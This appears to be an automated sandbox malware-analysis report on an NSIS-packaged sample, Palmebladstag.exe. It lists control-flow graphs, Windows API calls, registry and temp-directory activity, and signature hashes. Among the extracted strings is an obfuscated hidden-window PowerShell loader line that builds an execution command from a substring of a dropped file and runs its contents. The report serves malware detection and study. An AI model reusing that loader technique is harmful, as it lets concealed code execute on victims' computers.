                                            control_flow_graph 616 402e6c-402e82 617 402e84 616->617 618 402e8b-402e93 616->618 617->618 619 402e95 618->619 620 402e9c-402ea1 618->620 619->620 621 402eb1-402ebe call 403072 620->621 622 402ea3-402eac call 4030a4 620->622 626 403060 621->626 627 402ec4-402ec8 621->627 622->621 628 403062-403063 626->628 629 403001-403003 627->629 630 402ece-402ef1 GetTickCount 627->630 633 40306b-40306f 628->633 631 403005-403008 629->631 632 40304d-403050 629->632 634 402ef7 630->634 635 403068 630->635 631->635 638 40300a 631->638 636 403052 632->636 637 403055-40305e call 403072 632->637 639 402efc-402f04 634->639 635->633 636->637 637->626 649 403065 637->649 641 40300f-403015 638->641 642 402f06 639->642 643 402f09-402f12 call 403072 639->643 645 403017 641->645 646 40301a-403023 call 403072 641->646 642->643 643->626 651 402f18-402f21 643->651 645->646 646->626 654 403025-403038 WriteFile 646->654 649->635 653 402f27-402f47 call 405f82 651->653 661 402ff9-402ffb 653->661 662 402f4d-402f64 GetTickCount 653->662 655 40303a-40303d 654->655 656 402ffd-402fff 654->656 655->656 658 40303f-403049 655->658 656->628 658->641 660 40304b 658->660 660->635 661->628 663 402f66-402f6e 662->663 664 402fa9-402fad 662->664 665 402f70-402f74 663->665 666 402f76-402fa6 MulDiv wsprintfA call 404e84 663->666 667 402fee-402ff1 664->667 668 402faf-402fb2 664->668 665->664 665->666 666->664 667->639 669 402ff7 667->669 671 402fd4-402fdf 668->671 672 402fb4-402fc8 WriteFile 668->672 669->635 673 402fe2-402fe6 671->673 672->656 675 402fca-402fcd 672->675 673->653 676 402fec 673->676 675->656 677 402fcf-402fd2 675->677 676->635 677->673
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402ECE
                                            • GetTickCount.KERNEL32 ref: 00402F55
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F82
                                            • wsprintfA.USER32 ref: 00402F92
                                            • WriteFile.KERNELBASE(00000000,00000000,0078DCE3,7FFFFFFF,00000000), ref: 00402FC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 4209647438-2449383134
                                            • Opcode ID: e24983cdfa451a0b327b644453433b6db490601bf4b958802b8ace213f2da93d
                                            • Instruction ID: abbc5e543d40cc295139a54e2e8a13b251616715b744bb5f177e15d4b263a606
                                            • Opcode Fuzzy Hash: e24983cdfa451a0b327b644453433b6db490601bf4b958802b8ace213f2da93d
                                            • Instruction Fuzzy Hash: B1519C7190121AABCF10DF69DA48A9E7BB8BF04355F14413BF901B72C4D3789E50DBAA

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 678 401f68-401f74 679 401f7a-401f90 call 402a07 * 2 678->679 680 40202f-402031 678->680 691 401f92-401f9d GetModuleHandleA 679->691 692 401f9f-401fad LoadLibraryExA 679->692 682 40217a-40217f call 401423 680->682 688 40289c-4028ab 682->688 689 40266d-402674 682->689 689->688 691->692 694 401faf-401fbc GetProcAddress 691->694 692->694 695 402028-40202a 692->695 696 401ffb-402000 call 404e84 694->696 697 401fbe-401fc4 694->697 695->682 701 402005-402008 696->701 699 401fc6-401fd2 call 401423 697->699 700 401fdd-401ff9 697->700 699->701 710 401fd4-401fdb 699->710 700->701 701->688 704 40200e-402016 call 4035c2 701->704 704->688 709 40201c-402023 FreeLibrary 704->709 709->688 710->701
                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00402FA6,00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                            Strings
                                            • -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), xrefs: 00401FE7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID: -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)
                                            • API String ID: 2987980305-347237250
                                            • Opcode ID: bcc850c2b2dc6c63775bb48a6632502ce23c7851ac81b7e3be6f2784b42c2a09
                                            • Instruction ID: d3abe0a985e527f0133db3cb222e4045a6b822903cb71d54981d30858ec5e20d
                                            • Opcode Fuzzy Hash: bcc850c2b2dc6c63775bb48a6632502ce23c7851ac81b7e3be6f2784b42c2a09
                                            • Instruction Fuzzy Hash: 01213032904211ABCF207F64CE49A6F79B0AF44358F20413BF601B62D1D7BD4E419A5E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 711 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 718 402366-40236e 711->718 719 40289c-4028ab 711->719 721 402370-40237d call 402a07 lstrlenA 718->721 722 40237e-402381 718->722 721->722 725 402391-402394 722->725 726 402383-402390 call 4029ea 722->726 727 4023a5-4023b9 RegSetValueExA 725->727 728 402396-4023a0 call 402e6c 725->728 726->725 732 4023bb 727->732 733 4023be-402494 RegCloseKey 727->733 728->727 732->733 733->719
                                            APIs
                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                            • lstrlenA.KERNEL32(prludyur\ma\,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                            • RegSetValueExA.KERNELBASE(?,?,?,?,prludyur\ma\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                            • RegCloseKey.ADVAPI32(?,?,?,prludyur\ma\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID: prludyur\ma\
                                            • API String ID: 1356686001-2726131193
                                            • Opcode ID: c9a047b47d66a30ce1725bc46027acf1bb08f56e3d4e0f37dad4e26af361af7d
                                            • Instruction ID: 496afd6724d83472fd7aeeeeb6c9636b40b67d15b6efd44fac0fbba193c6cb19
                                            • Opcode Fuzzy Hash: c9a047b47d66a30ce1725bc46027acf1bb08f56e3d4e0f37dad4e26af361af7d
                                            • Instruction Fuzzy Hash: 40116071E00208BEEB10EFB5CE89EAF7A78EB44358F10403AF905B61D1D6B85D419A69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 736 4015b3-4015c6 call 402a07 call 4056bd 741 4015c8-4015e3 call 40564f CreateDirectoryA 736->741 742 40160a-40160d 736->742 750 401600-401608 741->750 751 4015e5-4015f0 GetLastError 741->751 743 401638-40217f call 401423 742->743 744 40160f-40162a call 401423 call 405b77 SetCurrentDirectoryA 742->744 758 40289c-4028ab 743->758 759 40266d-402674 743->759 744->758 761 401630-401633 744->761 750->741 750->742 754 4015f2-4015fb GetFileAttributesA 751->754 755 4015fd 751->755 754->750 754->755 755->750 759->758 761->758
                                            APIs
                                              • Part of subcall function 004056BD: CharNextA.USER32(?,?,C:\,?,00405729,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004056CB
                                              • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                              • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145,00000000,00000000,000000F0), ref: 00401622
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145, xrefs: 00401617
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                            • String ID: C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145
                                            • API String ID: 3751793516-4109978481
                                            • Opcode ID: 8e32af734a1bb1b8abe6c4c6f97643a22fa818e1e36aadc160386304dc852ad0
                                            • Instruction ID: be2e729169105f21f0136a8afe605fb55404e4043758c9297c14daf22ca337c6
                                            • Opcode Fuzzy Hash: 8e32af734a1bb1b8abe6c4c6f97643a22fa818e1e36aadc160386304dc852ad0
                                            • Instruction Fuzzy Hash: A7114831908150ABDB213F755D04EBF77B4EE56366724073FF492B22E2C63C09429A2E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 763 405854-40585e 764 40585f-40588a GetTickCount GetTempFileNameA 763->764 765 405899-40589b 764->765 766 40588c-40588e 764->766 768 405893-405896 765->768 766->764 767 405890 766->767 767->768
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405868
                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405882
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\Palmebladstag.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2289737243
                                            • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                            • Instruction ID: 7032c49e779d22ef4b019cebcd704e5cdda6a64cd28d021928a5f34cef86c798
                                            • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                            • Instruction Fuzzy Hash: 21F082777082046BDB109F66DC04B9B7B9CDF95750F14C03BFE44DA180D6B499548B59

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 769 402a47-402a70 RegOpenKeyExA 770 402a72-402a7d 769->770 771 402adb-402adf 769->771 772 402a98-402aa8 RegEnumKeyA 770->772 773 402aaa-402abc RegCloseKey call 405ea2 772->773 774 402a7f-402a82 772->774 782 402ae2-402ae8 773->782 783 402abe-402acd 773->783 775 402a84-402a96 call 402a47 774->775 776 402acf-402ad2 RegCloseKey 774->776 775->772 775->773 780 402ad8-402ada 776->780 780->771 782->780 784 402aea-402af8 RegDeleteKeyA 782->784 783->771 784->780 785 402afa 784->785 785->771
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A68
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                            • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                            • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                            • Instruction ID: 1ad4598d9375e79b5c4158f8ae6fede31b6a0d7771ae0489b8e1e2a10aea7df0
                                            • Opcode Fuzzy Hash: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                            • Instruction Fuzzy Hash: 72116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                            • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                            • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                            • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18
                                            APIs
                                              • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                              • Part of subcall function 004056BD: CharNextA.USER32(?,?,C:\,?,00405729,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004056CB
                                              • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                              • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 00405765
                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410), ref: 00405775
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\
                                            • API String ID: 3248276644-3404278061
                                            • Opcode ID: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                            • Instruction ID: 9c3b755cb3c6d616dab6a000ce5f665f7bfd003de174882c1d400389f5d3e8f3
                                            • Opcode Fuzzy Hash: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                            • Instruction Fuzzy Hash: 62F0C835105D5499C62237391D45AAF2658CD87364F180A3BF851B32D1DB3C8942BDAE
                                            APIs
                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 0040536C
                                            • CloseHandle.KERNEL32(?), ref: 00405379
                                            Strings
                                            • Error launching installer, xrefs: 0040535A
                                            Memory Dump Source
